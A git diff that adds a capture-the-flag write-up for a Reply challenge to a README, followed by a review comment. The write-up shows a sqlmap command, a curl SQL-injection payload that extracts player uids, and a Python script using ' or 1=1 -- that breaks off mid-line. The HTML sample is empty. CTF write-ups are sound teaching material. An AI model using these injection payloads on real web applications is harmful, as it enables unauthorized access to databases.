diff --git a/challenges.reply.com-23/The_Last_Fighting_Goat/README.md b/challenges.reply.com-23/The_Last_Fighting_Goat/README.md index 2b24016..d69e7f0 100644 --- a/challenges.reply.com-23/The_Last_Fighting_Goat/README.md +++ b/challenges.reply.com-23/The_Last_Fighting_Goat/README.md @@ -8,10 +8,70 @@ The palace of the Web Realm, a gleaming place called Hypercloud, is guarded by P #### Solution: +- poking around the application revealed that one page have hidden form field +```html +
+``` +- using it with `sqlmap -u "http://gamebox1.reply.it/web2-3c91477fb7fb643fc15d090da43cb634f20f0ed7/hof" --data "year=*" --random-agent --level 5 --risk 3 --dbs` reveals that there is SQL injection +- after long time digging and trying out different stuff we found that there is in the same table also `uid` column that could be leaked/guessed for the `top` players with `curl -vX POST 'http://gamebox1.reply.it/web2-3c91477fb7fb643fc15d090da43cb634f20f0ed7/hof' --data "year=' or (1=1 and year=2023 and name='humming_non-smoker2003' and uid like '2%')--"` + +```python +import requests +import string + +candidates = "abcdef" + string.digits + '-' + +ses = requests.session() + +r = ses.post( + "http://gamebox1.reply.it/web2-3c91477fb7fb643fc15d090da43cb634f20f0ed7/hof", + data={"year": "' or 1=1 --"} +) + +names = [] + +for line in r.text.splitlines(): + if '
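Review bot: the `html` fence under the first bullet is empty in this hunk, so the hidden form field that the whole solution hinges on (the `year` parameter that `sqlmap` is later pointed at with `--data "year=*"`) is never actually shown; paste the real `<input>` markup so a reader can see which field was hidden and why an unexpected value in it matters. The Python block is also truncated right after `for line in r.text.splitlines():` / `if '`, which leaves `names = []` never populated and the per-character `uid` guessing that the third bullet describes missing entirely; either complete the script or say explicitly that only the name-scraping part is included. Minor wording in the first and third bullets: "one page have hidden form field" should read "one page has a hidden form field", and "after long time digging" should read "after a long time of digging".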